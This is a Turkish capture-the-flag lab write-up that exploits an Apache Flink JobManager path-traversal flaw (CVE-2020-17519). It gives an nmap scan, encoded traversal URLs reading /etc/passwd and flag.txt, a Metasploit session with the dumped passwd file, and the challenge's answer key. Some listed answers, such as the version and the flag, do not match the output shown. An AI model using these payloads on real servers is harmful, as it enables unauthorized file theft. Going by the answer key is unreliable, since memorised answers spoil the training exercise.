# Hack Web Services! Part - 1 Apache Flink 


**Açıklama**:

CyberPath Bank sizi sızma testi sağlayıcısı olarak işe aldı. Bu hafta iç ağda bulunan servisleri test etmeniz istendi. Bugün Apache Flink çalıştıran sistemin güvenliğini test edeceksiniz.

Apache Flink, Apache Software Foundation tarafından geliştirilen açık kaynaklı, birleşik bir akış işleme ve toplu işleme çerçevesidir.  Apache Flink'in özü, Java ve Scala'da yazılmış dağıtılmış bir akış veri akışı motorudur.  Flink, rastgele veri akışı programlarını veri paralel ve ardışık düzende yürütür.


**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Çalışan zaafiyetli servisin versiyonunu bulmak.
- Zaafiyetli servisin CVE ID'sini bulmak.
- Hassas dosyalara erişmek.


**Flags**:
- Server'da açık olan port?
    - answer: **8081**
- Server'da çalışan uygulamanın ismi?
    - answer: **Apache Flink**
- Server'da çalışan uygulamanın versiyonu?
    - answer: **8.11.0**
- Uygulamaya ait CVE?
    - answer: **CVE-2020-17519**
- flag.txt?
    - answer: **CyberPath{M3XJnYJefkx76fwY}**

## **Solution**:

- **Enum**:

```
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 31973  bytes 1736245 (1.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 31710  bytes 9206426 (9.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1140  bytes 6923048 (6.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1140  bytes 6923048 (6.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.87 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-29 12:31 UTC
Nmap scan report for web_2_web_1.web_2_internal_network (10.0.0.87)
Host is up (0.000071s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE          VERSION
6123/tcp  open  spark            Apache Spark
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6124/tcp  open  printer
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8081/tcp  open  blackice-icecap?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Type: application/json; charset=UTF-8
|     content-length: 74
|     {"errors":["Unable to load requested file /nice ports,/Trinity.txt.bak."]}
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Wed, 29 Dec 2021 12:31:17 GMT
|     Expires: Wed, 29 Dec 2021 12:36:17 GMT
|     Cache-Control: private, max-age=300
|     Last-Modified: Wed, 29 Dec 2021 12:29:22 GMT
|     content-length: 2137
|     <!--
|     Licensed to the Apache Software Foundation (ASF) under one
|     more contributor license agreements. See the NOTICE file
|     distributed with this work for additional information
|     regarding copyright ownership. The ASF licenses this file
|     under the Apache License, Version 2.0 (the
|     "License"); you may not use this file except in compliance
|     with the License. You may obtain a copy of the License at
|     http://www.apache.org/licenses/LICENSE-2.0
|     Unless required by applicable law or agreed to in writing, software
|     distributed under the License is distributed on an "AS IS" BASIS,
|     WITHOUT WARRANTIES OR CONDITIONS OF
|   SIPOptions: 
|     HTTP/1.1 404 Not Found
|     Content-Type: application/json; charset=UTF-8
|     Access-Control-Allow-Origin: *
|     Connection: keep-alive
|     content-length: 25
|     {"errors":["Not found."]}
|   WWWOFFLEctrlstat: 
|     HTTP/1.1 404 Not Found
|     Content-Type: application/json; charset=UTF-8
|     content-length: 58
|_    {"errors":["Unable to load requested file /bad-request."]}
39765/tcp open  spark            Apache Spark
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.80%I=7%D=12/29%Time=61CC5515%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,93B,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html\r\n
SF:Date:\x20Wed,\x2029\x20Dec\x202021\x2012:31:17\x20GMT\r\nExpires:\x20We
SF:d,\x2029\x20Dec\x202021\x2012:36:17\x20GMT\r\nCache-Control:\x20private
SF:,\x20max-age=300\r\nLast-Modified:\x20Wed,\x2029\x20Dec\x202021\x2012:2
SF:9:22\x20GMT\r\ncontent-length:\x202137\r\n\r\n<!--\n\x20\x20~\x20Licens
SF:ed\x20to\x20the\x20Apache\x20Software\x20Foundation\x20\(ASF\)\x20under
SF:\x20one\n\x20\x20~\x20or\x20more\x20contributor\x20license\x20agreement
SF:s\.\x20\x20See\x20the\x20NOTICE\x20file\n\x20\x20~\x20distributed\x20wi
SF:th\x20this\x20work\x20for\x20additional\x20information\n\x20\x20~\x20re
SF:garding\x20copyright\x20ownership\.\x20\x20The\x20ASF\x20licenses\x20th
SF:is\x20file\n\x20\x20~\x20to\x20you\x20under\x20the\x20Apache\x20License
SF:,\x20Version\x202\.0\x20\(the\n\x20\x20~\x20\"License\"\);\x20you\x20ma
SF:y\x20not\x20use\x20this\x20file\x20except\x20in\x20compliance\n\x20\x20
SF:~\x20with\x20the\x20License\.\x20\x20You\x20may\x20obtain\x20a\x20copy\
SF:x20of\x20the\x20License\x20at\n\x20\x20~\n\x20\x20~\x20\x20\x20\x20\x20
SF:http://www\.apache\.org/licenses/LICENSE-2\.0\n\x20\x20~\n\x20\x20~\x20
SF:Unless\x20required\x20by\x20applicable\x20law\x20or\x20agreed\x20to\x20
SF:in\x20writing,\x20software\n\x20\x20~\x20distributed\x20under\x20the\x2
SF:0License\x20is\x20distributed\x20on\x20an\x20\"AS\x20IS\"\x20BASIS,\n\x
SF:20\x20~\x20WITHOUT\x20WARRANTIES\x20OR\x20CONDITIONS\x20OF")%r(FourOhFo
SF:urRequest,A7,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20appl
SF:ication/json;\x20charset=UTF-8\r\ncontent-length:\x2074\r\n\r\n{\"error
SF:s\":\[\"Unable\x20to\x20load\x20requested\x20file\x20/nice\x20ports,/Tr
SF:inity\.txt\.bak\.\"\]}")%r(SIPOptions,AE,"HTTP/1\.1\x20404\x20Not\x20Fo
SF:und\r\nContent-Type:\x20application/json;\x20charset=UTF-8\r\nAccess-Co
SF:ntrol-Allow-Origin:\x20\*\r\nConnection:\x20keep-alive\r\ncontent-lengt
SF:h:\x2025\r\n\r\n{\"errors\":\[\"Not\x20found\.\"\]}")%r(WWWOFFLEctrlsta
SF:t,97,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20application/
SF:json;\x20charset=UTF-8\r\ncontent-length:\x2058\r\n\r\n{\"errors\":\[\"
SF:Unable\x20to\x20load\x20requested\x20file\x20/bad-request\.\"\]}");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.34 seconds
```

Eğer 8081 portunu tarayıcı ile açarsak Apache Flink uygulamasını görebilir ve versiyonunu öğrenebiliriz.

![image](1.PNG)

- **Manual Explotation**:

```
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f
```

sonrasında okuma izni +7 olan tüm dosyalar okunabilir. etc/passwd için:

```
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```

![image](2.PNG)

flag için:

```
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fflag.txt
```
![image](3.PNG)

- **Explotation with Metasploit**:

```
attacker@cyberpath:~$ msfconsole 
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
[!] The following modules could not be loaded!..|
[!] 	/opt/metasploit-framework/embedded/framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/attacker/.msf4/logs/framework.log for details.
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com


       =[ metasploit v6.1.3-dev-                          ]
+ -- --=[ 2161 exploits - 1146 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: You can pivot connections over sessions 
started with the ssh_login modules

msf6 > search flink

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/apache_flink_jar_upload_exec           2019-11-13       excellent  Yes    Apache Flink JAR Upload Java Code Execution
   1  auxiliary/scanner/http/apache_flink_jobmanager_traversal  2021-01-05       normal     Yes    Apache Flink JobManager Traversal
   2  auxiliary/admin/networking/cisco_secure_acs_bypass                         normal     No     Cisco Secure ACS Unauthorized Password Change


Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/networking/cisco_secure_acs_bypass

msf6 > use 1
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > show options 

Module options (auxiliary/scanner/http/apache_flink_jobmanager_traversal):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     10               yes       Depth for path traversal
   FILEPATH  /etc/passwd      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     8081             yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   VHOST                      no        HTTP server virtual host

msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set rhosts 10.0.0.87
rhosts => 10.0.0.87
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > run

[*] Downloading /etc/passwd ...
[+] Downloaded /etc/passwd (964 bytes)
[+] File /etc/passwd saved in: /home/attacker/.msf4/loot/20211229123459_default_10.0.0.87_apache.flink.job_895973.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > cat /home/attacker/.msf4/loot/20211229123459_default_10.0.0.87_apache.flink.job_895973.txt
[*] exec: cat /home/attacker/.msf4/loot/20211229123459_default_10.0.0.87_apache.flink.job_895973.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flink:x:9999:9999::/opt/flink:/bin/sh
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > set filepath /flag.txt
filepath => /flag.txt
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > run

[*] Downloading /flag.txt ...
[+] Downloaded /flag.txt (16 bytes)
[+] File /flag.txt saved in: /home/attacker/.msf4/loot/20211229123524_default_10.0.0.87_apache.flink.job_225039.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > cat /home/attacker/.msf4/loot/20211229123524_default_10.0.0.87_apache.flink.job_225039.txt
[*] exec: cat /home/attacker/.msf4/loot/20211229123524_default_10.0.0.87_apache.flink.job_225039.txt

CyberPath{flag}
msf6 auxiliary(scanner/http/apache_flink_jobmanager_traversal) > exit
attacker@cyberpath:~$ 
```